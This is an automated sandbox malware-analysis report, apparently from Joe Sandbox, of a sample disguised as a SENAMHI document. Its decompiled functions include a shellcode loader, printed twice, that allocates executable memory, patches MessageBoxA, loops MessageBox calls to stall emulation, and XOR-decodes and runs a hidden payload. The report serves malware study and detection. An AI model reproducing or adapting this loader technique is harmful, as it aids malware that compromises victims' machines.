9367->9369 9374 159b14 9367->9374 9370 1575d4 _free 13 API calls 9368->9370 9381 159b47 9369->9381 9373 157291 CallUnexpected 9370->9373 9373->9358 9375 159b34 HeapSize 9374->9375 9376 159b1f 9374->9376 9375->9369 9377 1575d4 _free 13 API calls 9376->9377 9378 159b24 9377->9378 9379 15748c ___std_exception_copy 24 API calls 9378->9379 9380 159b2f 9379->9380 9380->9369 9382 159b54 9381->9382 9383 159b5f 9381->9383 9384 158bbc 14 API calls 9382->9384 9385 159b67 9383->9385 9391 159b70 _unexpected 9383->9391 9390 159b5c 9384->9390 9388 158b82 _free 13 API calls 9385->9388 9386 159b75 9389 1575d4 _free 13 API calls 9386->9389 9387 159b9a HeapReAlloc 9387->9390 9387->9391 9388->9390 9389->9390 9390->9373 9391->9386 9391->9387 9392 15893e _unexpected 2 API calls 9391->9392 9392->9391 9393->9364 9246 15458a 9251 154aef SetUnhandledExceptionFilter 9246->9251 9248 15458f 9252 1588fa 9248->9252 9250 15459a 9251->9248 9253 158906 9252->9253 9254 158920 9252->9254 9253->9254 9255 1575d4 _free 13 API calls 9253->9255 9254->9250 9256 158910 9255->9256 9257 15748c ___std_exception_copy 24 API calls 9256->9257 9258 15891b 9257->9258 9258->9250 9562 15943f 9563 15b8fc ___scrt_uninitialize_crt 63 API calls 9562->9563 9564 159447 9563->9564 9572 15c914 9564->9572 9566 15944c 9582 15c9bf 9566->9582 9569 159476 9570 158b82 _free 13 API calls 9569->9570 9571 159481 9570->9571 9573 15c920 ___scrt_is_nonwritable_in_current_image 9572->9573 9586 159d97 EnterCriticalSection 9573->9586 9575 15c997 9600 15c9b6 9575->9600 9577 15c92b 9577->9575 9579 15c96b DeleteCriticalSection 9577->9579 9587 15e56b 9577->9587 9580 158b82 _free 13 API calls 9579->9580 9580->9577 9583 15c9d6 9582->9583 9584 15945b DeleteCriticalSection 9582->9584 9583->9584 9585 158b82 _free 13 API calls 9583->9585 9584->9566 9584->9569 9585->9584 9586->9577 9588 15e577 ___scrt_is_nonwritable_in_current_image 9587->9588 9589 15e596 9588->9589 9590 15e581 9588->9590 9596 15e591 9589->9596 9603 15948b EnterCriticalSection 
9589->9603 9591 1575d4 _free 13 API calls 9590->9591 9592 15e586 9591->9592 9594 15748c ___std_exception_copy 24 API calls 9592->9594 9594->9596 9595 15e5b3 9604 15e4f4 9595->9604 9596->9577 9598 15e5be 9620 15e5e5 9598->9620 9679 159ddf LeaveCriticalSection 9600->9679 9602 15c9a3 9602->9566 9603->9595 9605 15e516 9604->9605 9606 15e501 9604->9606 9609 15b84f ___scrt_uninitialize_crt 59 API calls 9605->9609 9612 15e511 9605->9612 9607 1575d4 _free 13 API calls 9606->9607 9608 15e506 9607->9608 9610 15748c ___std_exception_copy 24 API calls 9608->9610 9611 15e52b 9609->9611 9610->9612 9613 15c9bf 13 API calls 9611->9613 9612->9598 9614 15e533 9613->9614 9615 159350 ___scrt_uninitialize_crt 24 API calls 9614->9615 9616 15e539 9615->9616 9623 15f268 9616->9623 9619 158b82 _free 13 API calls 9619->9612 9678 15949f LeaveCriticalSection 9620->9678 9622 15e5ed 9622->9596 9624 15f279 9623->9624 9627 15f28e 9623->9627 9626 1575c1 __dosmaperr 13 API calls 9624->9626 9625 15f2d7 9628 1575c1 __dosmaperr 13 API calls 9625->9628 9629 15f27e 9626->9629 9627->9625 9630 15f2b5 9627->9630 9631 15f2dc 9628->9631 9632 1575d4 _free 13 API calls 9629->9632 9638 15f1dc 9630->9638 9634 1575d4 _free 13 API calls 9631->9634 9635 15e53f 9632->9635 9636 15f2e4 9634->9636 9635->9612 9635->9619 9637 15748c ___std_exception_copy 24 API calls 9636->9637 9637->9635 9639 15f1e8 ___scrt_is_nonwritable_in_current_image 9638->9639 9649 15ba53 EnterCriticalSection 9639->9649 9641 15f1f6 9642 15f21d 9641->9642 9643 15f228 9641->9643 9650 15f2f5 9642->9650 9645 1575d4 _free 13 API calls 9643->9645 9646 15f223 9645->9646 9665 15f25c 9646->9665 9649->9641 9651 15bb2a ___scrt_uninitialize_crt 24 API calls 9650->9651 9653 15f305 9651->9653 9652 15f30b 9668 15ba99 9652->9668 9653->9652 9655 15bb2a ___scrt_uninitialize_crt 24 API calls 9653->9655 9664 15f33d 9653->9664 9658 15f334 9655->9658 9656 15bb2a ___scrt_uninitialize_crt 24 API calls 9659 15f349 CloseHandle 9656->9659 9661 15bb2a 
___scrt_uninitialize_crt 24 API calls 9658->9661 9659->9652 9662 15f355 GetLastError 9659->9662 9660 15f385 9660->9646 9661->9664 9662->9652 9663 15759e __dosmaperr 13 API calls 9663->9660 9664->9652 9664->9656 9677 15ba76 LeaveCriticalSection 9665->9677 9667 15f245 9667->9635 9669 15bb0f 9668->9669 9670 15baa8 9668->9670 9671 1575d4 _free 13 API calls 9669->9671 9670->9669 9676 15bad2 9670->9676 9672 15bb14 9671->9672 9673 1575c1 __dosmaperr 13 API calls 9672->9673 9674 15baff 9673->9674 9674->9660 9674->9663 9675 15baf9 SetStdHandle 9675->9674 9676->9674 9676->9675 9677->9667 9678->9622 9679->9602 10602 15b2ca 10603 15b2e3 10602->10603 10604 15b301 10602->10604 10603->10604 10605 15961d 29 API calls 10603->10605 10605->10603 10849 158f6b 10850 158f76 10849->10850 10851 158f86 10849->10851 10855 158f8c 10850->10855 10854 158b82 _free 13 API calls 10854->10851 10856 158fa1 10855->10856 10857 158fa7 10855->10857 10858 158b82 _free 13 API calls 10856->10858 10859 158b82 _free 13 API calls 10857->10859 10858->10857 10860 158fb3 10859->10860 10861 158b82 _free 13 API calls 10860->10861 10862 158fbe 10861->10862 10863 158b82 _free 13 API calls 10862->10863 10864 158fc9 10863->10864 10865 158b82 _free 13 API calls 10864->10865 10866 158fd4 10865->10866 10867 158b82 _free 13 API calls 10866->10867 10868 158fdf 10867->10868 10869 158b82 _free 13 API calls 10868->10869 10870 158fea 10869->10870 10871 158b82 _free 13 API calls 10870->10871 10872 158ff5 10871->10872 10873 158b82 _free 13 API calls 10872->10873 10874 159000 10873->10874 10875 158b82 _free 13 API calls 10874->10875 10876 15900e 10875->10876 10881 158db8 10876->10881 10882 158dc4 ___scrt_is_nonwritable_in_current_image 10881->10882 10897 159d97 EnterCriticalSection 10882->10897 10884 158df8 10898 158e17 10884->10898 10887 158dce 10887->10884 10888 158b82 _free 13 API calls 10887->10888 10888->10884 10889 158e23 10890 158e2f ___scrt_is_nonwritable_in_current_image 10889->10890 10902 159d97 EnterCriticalSection 
10890->10902 10892 158e39 10893 159059 _unexpected 13 API calls 10892->10893 10894 158e4c 10893->10894 10903 158e6c 10894->10903 10897->10887 10901 159ddf LeaveCriticalSection 10898->10901 10900 158e05 10900->10889 10901->10900 10902->10892 10906 159ddf LeaveCriticalSection 10903->10906 10905 158e5a 10905->10854 10906->10905 9259 157fea 9260 15ad73 44 API calls 9259->9260 9261 157ffc 9260->9261 9270 15b234 GetEnvironmentStringsW 9261->9270 9264 158007 9267 158b82 _free 13 API calls 9264->9267 9268 158036 9267->9268 9269 158b82 _free 13 API calls 9269->9264 9271 15b2a4 9270->9271 9274 15b24b ___scrt_uninitialize_crt 9270->9274 9272 158001 9271->9272 9273 15b2aa FreeEnvironmentStringsW 9271->9273 9272->9264 9280 15803c 9272->9280 9273->9272 9274->9271 9275 15b26e 9274->9275 9276 158bbc 14 API calls 9275->9276 9278 15b274 ___scrt_uninitialize_crt 9276->9278 9277 158b82 _free 13 API calls 9279 15b2a1 9277->9279 9278->9277 9279->9271 9281 158051 9280->9281 9282 159e27 _unexpected 13 API calls 9281->9282 9292 158078 9282->9292 9283 1580dd 9284 158b82 _free 13 API calls 9283->9284 9285 158012 9284->9285 9285->9269 9286 159e27 _unexpected 13 API calls 9286->9292 9287 1580df 9306 15810c 9287->9306 9291 1580ff 9294 15749c ___std_exception_copy 11 API calls 9291->9294 9292->9283 9292->9286 9292->9287 9292->9291 9295 158b82 _free 13 API calls 9292->9295 9297 158a6a 9292->9297 9293 158b82 _free 13 API calls 9293->9283 9296 15810b 9294->9296 9295->9292 9298 158a77 9297->9298 9299 158a85 9297->9299 9298->9299 9304 158a9c 9298->9304 9300 1575d4 _free 13 API calls 9299->9300 9301 158a8d 9300->9301 9302 15748c ___std_exception_copy 24 API calls 9301->9302 9303 158a97 9302->9303 9303->9292 9304->9303 9305 1575d4 _free 13 API calls 9304->9305 9305->9301 9307 1580e5 9306->9307 9308 158119 9306->9308 9307->9293 9309 158130 9308->9309 9310 158b82 _free 13 API calls 9308->9310 9311 158b82 _free 13 API calls 9309->9311 9310->9308 9311->9307 10388 15886a 10391 1587f1 10388->10391 10392 
1587fd ___scrt_is_nonwritable_in_current_image 10391->10392 10399 159d97 EnterCriticalSection 10392->10399 10394 158835 10400 158853 10394->10400 10395 158807 10395->10394 10398 15c2be __fassign 13 API calls 10395->10398 10398->10395 10399->10395 10403 159ddf LeaveCriticalSection 10400->10403 10402 158841 10403->10402

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 116 154aef-154afa SetUnhandledExceptionFilter
    C-Code - Quality: 100%
    			E00154AEF() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E00154AFB); // executed
    				return _t1;
    			}




    0x00154af4
    0x00154afa

    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_00004AFB,0015458F), ref: 00154AF4
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: bc85f0bc410adb9eb4e0d29108f4b8823560e69d4b77c8d2b86484fb050d9961
    • Instruction ID: f11375c4f22a6b4973ddd230cc9c8366044bed9502e6be7c4268db7564a8ad1d
    • Opcode Fuzzy Hash: bc85f0bc410adb9eb4e0d29108f4b8823560e69d4b77c8d2b86484fb050d9961
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 52%
    			E00153A84() {
    				signed int _v8;
    				intOrPtr _v12;
    				char _v109;
    				char _v110;
    				char _v111;
    				char _v112;
    				struct _SECURITY_ATTRIBUTES* _v116;
    				void* _v120;
    				long _v124;
    				signed int _t38;
    				void* _t40;
    				signed int _t62;
    				void* _t63;
    				CHAR* _t64;
    				signed int _t66;
    				void* _t67;
    				signed int* _t71;
    				signed int _t72;
    				_Unknown_base(*)()* _t74;
    				signed int _t76;
    				signed int _t77;
    
    				_t76 = _t77;
    				_t38 =  *0x169008; // 0x26a91022
    				_v8 = _t38 ^ _t76;
    				asm("movaps xmm0, [0x1662b0]");
    				asm("movups [ebp-0x68], xmm0");
    				asm("movaps xmm0, [0x166270]");
    				asm("movups [ebp-0x58], xmm0");
    				asm("movaps xmm0, [0x166280]");
    				asm("movups [ebp-0x48], xmm0");
    				asm("movaps xmm0, [0x1662a0]");
    				asm("movups [ebp-0x38], xmm0");
    				asm("movaps xmm0, [0x166290]");
    				asm("movups [ebp-0x28], xmm0");
    				asm("movaps xmm0, [0x166260]");
    				asm("movups [ebp-0x18], xmm0");
    				_v12 = 0x9d580485;
    				_t40 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
    				_t74 = MessageBoxA;
    				_v124 = _v124 & 0x00000000;
    				_v120 = _t40;
    				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v124); // executed
    				_t71 = 0x26387c;
    				_v109 =  *MessageBoxA;
    				_v110 =  *((intOrPtr*)(1));
    				_v111 =  *((intOrPtr*)(2));
    				_v112 =  *((intOrPtr*)(3));
    				 *MessageBoxA = 0x900010c2;
    				_v116 = 0;
    				do {
    					_t62 =  !( *_t71); // executed
    					CreateThread(0, 0, _t74, 0, 0, 0); // executed
    					if(_t62 != 0) {
    						 *(_v116 + _v120) = _t62;
    					}
    					_v116 = _v116 + 1;
    					_t71 = _t71 - 4;
    					_push(0);
    					_pop(0);
    				} while (_t71 >= 0x169880);
    				_t63 = 0xea920;
    				do {
    					_t72 = 0x400;
    					do {
    						MessageBoxA(0, "rick", "rick", 2);
    						_t72 = _t72 - 1;
    					} while (_t72 != 0);
    					_t63 = _t63 - 1;
    				} while (_t63 != 0);
    				_t64 = "rick";
    				do {
    					MessageBoxA(0, _t64, _t64, 1);
    					_t66 = 0x64;
    					_t67 = _v120;
    					 *(_t67 + _t72) =  *(_t67 + _t72) ^  *(_t76 + _t72 % _t66 - 0x68);
    					_t72 = _t72 + 1;
    				} while (_t72 < 0x3e800);
    				 *_t74 = _v109;
    				 *((char*)(_t74 + 1)) = _v110;
    				 *((char*)(_t74 + 2)) = _v111;
    				 *((char*)(_t74 + 3)) = _v112;
    				 *_t67();
    				L12:
    				Sleep(0x1388);
    				goto L12;
    			}

























    APIs
    • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00153AF0
    • VirtualProtect.KERNELBASE(74317E90,00000100,00000040,00000000), ref: 00153B0F
    • CreateThread.KERNELBASE(00000000,00000000,74317E90,00000000,00000000,00000000), ref: 00153B46
    • MessageBoxA.USER32 ref: 00153B82
    • MessageBoxA.USER32 ref: 00153B99
    • Sleep.KERNEL32(00001388), ref: 00153BD5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: MessageVirtual$AllocCreateProtectSleepThread
    • String ID: rick$|8&
    • API String ID: 1205271519-1121119041
    • Opcode ID: 25b8f335346695120e735eedb78e9dc5a31549052f7cf30f88d3d9513c2700d2
    • Instruction ID: 3f72b6034b4907ecd339867a871a7e1e70f6c6e370030a898b4048fba0f11e30
    • Opcode Fuzzy Hash: 25b8f335346695120e735eedb78e9dc5a31549052f7cf30f88d3d9513c2700d2
    • Instruction Fuzzy Hash: 1141C625E043889EE7118FB88D51BEDBFB8AF2A301F14520DE9986B653D76015C5C750
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 13 153a86-153b39 VirtualAlloc VirtualProtect 14 153b3c-153b4e CreateThread 13->14 15 153b50-153b56 14->15 16 153b59-153b68 14->16 15->16 16->14 17 153b6a 16->17 18 153b6f 17->18 19 153b74-153b87 MessageBoxA 18->19 19->19 20 153b89-153b8c 19->20 20->18 21 153b8e 20->21 22 153b93-153bb5 MessageBoxA 21->22 22->22 23 153bb7-153bcb 22->23 24 153bd0-153bdb Sleep 23->24 24->24
    C-Code - Quality: 51%
    			E00153A86() {
    				signed int _v8;
    				intOrPtr _v12;
    				char _v109;
    				char _v110;
    				char _v111;
    				char _v112;
    				struct _SECURITY_ATTRIBUTES* _v116;
    				void* _v120;
    				long _v124;
    				signed int _t36;
    				void* _t38;
    				signed int _t60;
    				void* _t61;
    				CHAR* _t62;
    				signed int _t64;
    				void* _t65;
    				signed int* _t69;
    				signed int _t70;
    				_Unknown_base(*)()* _t72;
    				signed int _t73;
    
    				_t36 =  *0x169008; // 0x26a91022
    				_v8 = _t36 ^ _t73;
    				asm("movaps xmm0, [0x1662b0]");
    				asm("movups [ebp-0x68], xmm0");
    				asm("movaps xmm0, [0x166270]");
    				asm("movups [ebp-0x58], xmm0");
    				asm("movaps xmm0, [0x166280]");
    				asm("movups [ebp-0x48], xmm0");
    				asm("movaps xmm0, [0x1662a0]");
    				asm("movups [ebp-0x38], xmm0");
    				asm("movaps xmm0, [0x166290]");
    				asm("movups [ebp-0x28], xmm0");
    				asm("movaps xmm0, [0x166260]");
    				asm("movups [ebp-0x18], xmm0");
    				_v12 = 0x9d580485;
    				_t38 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
    				_t72 = MessageBoxA;
    				_v124 = _v124 & 0x00000000;
    				_v120 = _t38;
    				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v124); // executed
    				_t69 = 0x26387c;
    				_v109 =  *MessageBoxA;
    				_v110 =  *((intOrPtr*)(1));
    				_v111 =  *((intOrPtr*)(2));
    				_v112 =  *((intOrPtr*)(3));
    				 *MessageBoxA = 0x900010c2;
    				_v116 = 0;
    				do {
    					_t60 =  !( *_t69); // executed
    					CreateThread(0, 0, _t72, 0, 0, 0); // executed
    					if(_t60 != 0) {
    						 *(_v116 + _v120) = _t60;
    					}
    					_v116 = _v116 + 1;
    					_t69 = _t69 - 4;
    					_push(0);
    					_pop(0);
    				} while (_t69 >= 0x169880);
    				_t61 = 0xea920;
    				do {
    					_t70 = 0x400;
    					do {
    						MessageBoxA(0, "rick", "rick", 2);
    						_t70 = _t70 - 1;
    					} while (_t70 != 0);
    					_t61 = _t61 - 1;
    				} while (_t61 != 0);
    				_t62 = "rick";
    				do {
    					MessageBoxA(0, _t62, _t62, 1);
    					_t64 = 0x64;
    					_t65 = _v120;
    					 *(_t65 + _t70) =  *(_t65 + _t70) ^  *(_t73 + _t70 % _t64 - 0x68);
    					_t70 = _t70 + 1;
    				} while (_t70 < 0x3e800);
    				 *_t72 = _v109;
    				 *((char*)(_t72 + 1)) = _v110;
    				 *((char*)(_t72 + 2)) = _v111;
    				 *((char*)(_t72 + 3)) = _v112;
    				 *_t65();
    				L11:
    				Sleep(0x1388);
    				goto L11;
    			}
























    APIs
    • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00153AF0
    • VirtualProtect.KERNELBASE(74317E90,00000100,00000040,00000000), ref: 00153B0F
    • CreateThread.KERNELBASE(00000000,00000000,74317E90,00000000,00000000,00000000), ref: 00153B46
    • MessageBoxA.USER32 ref: 00153B82
    • MessageBoxA.USER32 ref: 00153B99
    • Sleep.KERNEL32(00001388), ref: 00153BD5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: MessageVirtual$AllocCreateProtectSleepThread
    • String ID: rick$|8&
    • API String ID: 1205271519-1121119041
    • Opcode ID: 389e4c87b35c5c877fa51b3aa6a2d90e6d9db5a1dd0f2e8b8cac319f5404c1d3
    • Instruction ID: 08cab6686f9e6370d8d90a54898156a849c47a18e1a80e7e021810b35470c288
    • Opcode Fuzzy Hash: 389e4c87b35c5c877fa51b3aa6a2d90e6d9db5a1dd0f2e8b8cac319f5404c1d3
    • Instruction Fuzzy Hash: 4241C425E043889AE7128FB88D51BEDBFB8AF2A301F18520DE9986B653D7A015C5C760
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 25 15803c-15804f 26 158069-15806b 25->26 27 158051-158053 26->27 28 15806d-15807e call 159e27 26->28 29 158055 27->29 30 158056-158058 27->30 35 158080-158083 28->35 36 1580ee 28->36 29->30 32 15805b-158060 30->32 32->32 34 158062-158067 32->34 34->26 38 1580d7-1580db 35->38 37 1580f0-1580fe call 158b82 36->37 40 158085-158087 38->40 41 1580dd 38->41 43 15808a-15808f 40->43 41->37 43->43 44 158091-15809c 43->44 45 1580d5 44->45 46 15809e-1580a1 call 159e27 44->46 45->38 48 1580a6-1580ac 46->48 49 1580df-1580ed call 15810c call 158b82 48->49 50 1580ae-1580bd call 158a6a 48->50 49->36 55 1580ff-15810b call 15749c 50->55 56 1580bf-1580d4 call 158b82 50->56 56->45
    C-Code - Quality: 83%
    			E0015803C(void* __ebx, intOrPtr* _a4) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				intOrPtr* _v40;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				void* _t24;
    				void* _t26;
    				intOrPtr _t27;
    				intOrPtr* _t29;
    				intOrPtr* _t33;
    				intOrPtr* _t36;
    				intOrPtr* _t41;
    				intOrPtr _t50;
    				intOrPtr _t51;
    				void* _t53;
    				intOrPtr* _t54;
    				intOrPtr* _t56;
    				intOrPtr* _t59;
    				void* _t62;
    				intOrPtr _t63;
    				intOrPtr* _t64;
    				void* _t68;
    
    				_push(_t35);
    				_t33 = _a4;
    				_t50 = 0;
    				_t59 = _t33;
    				_t14 =  *_t33;
    				while(_t14 != 0) {
    					if(_t14 != 0x3d) {
    						_t50 = _t50 + 1;
    					}
    					_t36 = _t59;
    					_t53 = _t36 + 1;
    					do {
    						_t15 =  *_t36;
    						_t36 = _t36 + 1;
    					} while (_t15 != 0);
    					_t59 = _t59 + 1 + _t36 - _t53;
    					_t14 =  *_t59;
    				}
    				_t3 = _t50 + 1; // 0x1
    				_t54 = E00159E27(_t3, 4);
    				if(_t54 == 0) {
    					L19:
    					_t54 = 0;
    					goto L20;
    				} else {
    					_v8 = _t54;
    					while(1) {
    						_t51 =  *_t33;
    						if(_t51 == 0) {
    							break;
    						}
    						_t41 = _t33;
    						_t62 = _t41 + 1;
    						do {
    							_t20 =  *_t41;
    							_t41 = _t41 + 1;
    						} while (_t20 != 0);
    						_t21 = _t41 - _t62 + 1;
    						_v12 = _t21;
    						if(_t51 == 0x3d) {
    							L15:
    							_t33 = _t33 + _t21;
    							continue;
    						} else {
    							_t22 = E00159E27(_t21, 1); // executed
    							_t63 = _t22;
    							if(_t63 == 0) {
    								_push(_t54);
    								L22();
    								E00158B82(0);
    								goto L19;
    							} else {
    								_t24 = E00158A6A(_t63, _v12, _t33);
    								_t68 = _t68 + 0xc;
    								if(_t24 != 0) {
    									_push(0);
    									_push(0);
    									_push(0);
    									_push(0);
    									_push(0);
    									_t26 = E0015749C();
    									asm("int3");
    									_push(_t63);
    									_t64 = _v40;
    									if(_t64 != 0) {
    										_t27 =  *_t64;
    										_push(_t54);
    										_t56 = _t64;
    										while(_t27 != 0) {
    											E00158B82(_t27);
    											_t56 = _t56 + 4;
    											_t27 =  *_t56;
    										}
    										_t26 = E00158B82(_t64);
    									}
    									return _t26;
    								} else {
    									_t29 = _v8;
    									 *_t29 = _t63;
    									_v8 = _t29 + 4;
    									E00158B82(0);
    									_t21 = _v12;
    									goto L15;
    								}
    							}
    						}
    						goto L28;
    					}
    					L20:
    					E00158B82(0);
    					return _t54;
    				}
    				L28:
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 3227c4a33b616d44313f36813e1adeb1003ee72e47818581310f008235c852e9
    • Instruction ID: 9b200b1aec5ff63ee291022229bf7f99f34bbfb3d8dcb092f876db24337fc121
    • Opcode Fuzzy Hash: 3227c4a33b616d44313f36813e1adeb1003ee72e47818581310f008235c852e9
    • Instruction Fuzzy Hash: 07219032608200DFDF149E689842BBA7B69CF82326F280159FC60BF1C2DF335D0E8660
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E00157FEA(void* __eax, void* __ebx, void* __ecx, void* __edx) {
    
    				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
    			}

    APIs
      • Part of subcall function 0015B234: GetEnvironmentStringsW.KERNEL32 ref: 0015B23D
      • Part of subcall function 0015B234: _free.LIBCMT ref: 0015B29C
      • Part of subcall function 0015B234: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0015B2AB
    • _free.LIBCMT ref: 0015802A
    • _free.LIBCMT ref: 00158031
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free$EnvironmentStrings$Free
    • String ID:
    • API String ID: 2490078468-0
    • Opcode ID: 1804fe063bd54896d4b1637c9e9064cb3f22cc489ae7124fee10bb45d99d3dd1
    • Instruction ID: 02ec053ee7de60ad6ccbf6f8678ed9e66f66acb5c89f6e7d9adf05d5a746fd8f
    • Opcode Fuzzy Hash: 1804fe063bd54896d4b1637c9e9064cb3f22cc489ae7124fee10bb45d99d3dd1
    • Instruction Fuzzy Hash: E9E02223947810D9FB253B3E7C0262E26444BA1377F62031BFC30EE1C2DF60880E0556
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 80 15b905-15b912 call 159e27 82 15b917-15b922 80->82 83 15b924-15b926 82->83 84 15b928-15b930 82->84 85 15b973-15b97f call 158b82 83->85 84->85 86 15b932-15b936 84->86 87 15b938-15b96d call 15999f 86->87 92 15b96f-15b972 87->92 92->85
    C-Code - Quality: 95%
    			E0015B905(void* __edi, void* __eflags) {
    				intOrPtr _v12;
    				char _t17;
    				void* _t18;
    				intOrPtr* _t32;
    				char _t35;
    				void* _t37;
    
    				_push(_t27);
    				_t17 = E00159E27(0x40, 0x38); // executed
    				_t35 = _t17;
    				_v12 = _t35;
    				if(_t35 != 0) {
    					_t2 = _t35 + 0xe00; // 0xe00
    					_t18 = _t2;
    					__eflags = _t35 - _t18;
    					if(__eflags != 0) {
    						_t3 = _t35 + 0x20; // 0x20
    						_t32 = _t3;
    						_t37 = _t18;
    						do {
    							_t4 = _t32 - 0x20; // 0x0
    							E0015999F(__eflags, _t4, 0xfa0, 0);
    							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
    							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
    							 *_t32 = 0;
    							_t32 = _t32 + 0x38;
    							 *((intOrPtr*)(_t32 - 0x34)) = 0;
    							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
    							 *((char*)(_t32 - 0x2c)) = 0xa;
    							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
    							 *((char*)(_t32 - 0x26)) = 0;
    							__eflags = _t32 - 0x20 - _t37;
    						} while (__eflags != 0);
    						_t35 = _v12;
    					}
    				} else {
    					_t35 = 0;
    				}
    				E00158B82(0);
    				return _t35;
    			}

    APIs
      • Part of subcall function 00159E27: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00159246,00000001,00000364,00000006,000000FF,?,?,?,001575D9,0015116B), ref: 00159E68
    • _free.LIBCMT ref: 0015B974
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
